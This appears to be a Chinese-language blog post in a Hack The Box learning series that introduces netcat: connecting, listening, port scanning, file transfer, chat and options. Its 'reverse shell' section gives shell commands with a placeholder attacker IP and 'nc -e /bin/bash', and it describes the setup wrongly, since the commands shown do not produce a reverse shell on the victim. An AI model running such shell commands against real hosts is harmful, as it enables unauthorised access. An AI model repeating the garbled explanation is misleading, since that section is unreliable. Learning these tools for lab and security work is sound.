iT邦幫忙

2024 iThome 鐵人賽

DAY 25
0
Security

HTB_Headless系列 第 25

[番外04]netcat

  • 分享至 

  • xImage
  •  

netcat(通常縮寫為 nc)是一個功能強大的網絡工具,廣泛用於網絡診斷和安全測試。包括簡單的端口掃描、文件傳輸、服務端和客戶端連接等。以下是 netcat 的主要功能和用法介紹:

1. 基本用法

  • 連接到遠程主機的指定端口
nc [hostname] [port]

例如,連接到 example.com 的 80 端口:

nc example.com 80
  • 建立一個簡單的 TCP 伺服器
nc -l -p [port]

例如,在 1234 端口上啟動伺服器:

nc -l -p 1234

這會使 netcat 在該端口上等待連接。

2. 端口掃描

掃描範圍內的端口

nc -z [hostname] [port1]-[port2]

例如,掃描 example.com 的 1 到 100 端口:

nc -z example.com 1-100

3. 文件傳輸

從伺服器傳輸文件到客戶端

  • 在伺服器端:
nc -l -p [port] < [file]

例如,在 1234 端口上傳送 file.txt:

nc -l -p 1234 < file.txt
  • 在客戶端:
nc [hostname] [port] > [file]

例如,從 example.com 的 1234 端口接收文件:

nc example.com 1234 > file.txt

4. 進行簡單的聊天

  • 伺服器端
nc -l -p [port]

客戶端連接到這個端口後,你可以在伺服器端和客戶端之間進行實時聊天。

  • 客戶端
nc [hostname] [port]

5. 反向 Shell

  • 伺服器端(攻擊者)
nc -l -p [port] -e /bin/bash

這會在攻擊者的機器上啟動一個簡單的 shell 伺服器,並將其綁定到指定端口。

  • 客戶端(受害者)
nc [attacker_IP] [port]

這會連接到攻擊者的機器,並建立一個反向 shell 連接。

6. 與 netcat 的其他選項

  • -v: 增加輸出詳情(verbose mode)。
  • -u: 使用 UDP 而不是 TCP。
  • -z: 掃描端口時不發送任何數據,只檢查端口是否開放。
  • -e: 執行指定的程序(例如 bash)來提供 shell 功能。這個選項可能在某些版本中被禁用或不推薦使用,因為它可能帶來安全風險。

上一篇
[番外03]gobuster- vhost
下一篇
[番外05] Nmap
系列文
HTB_Headless30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言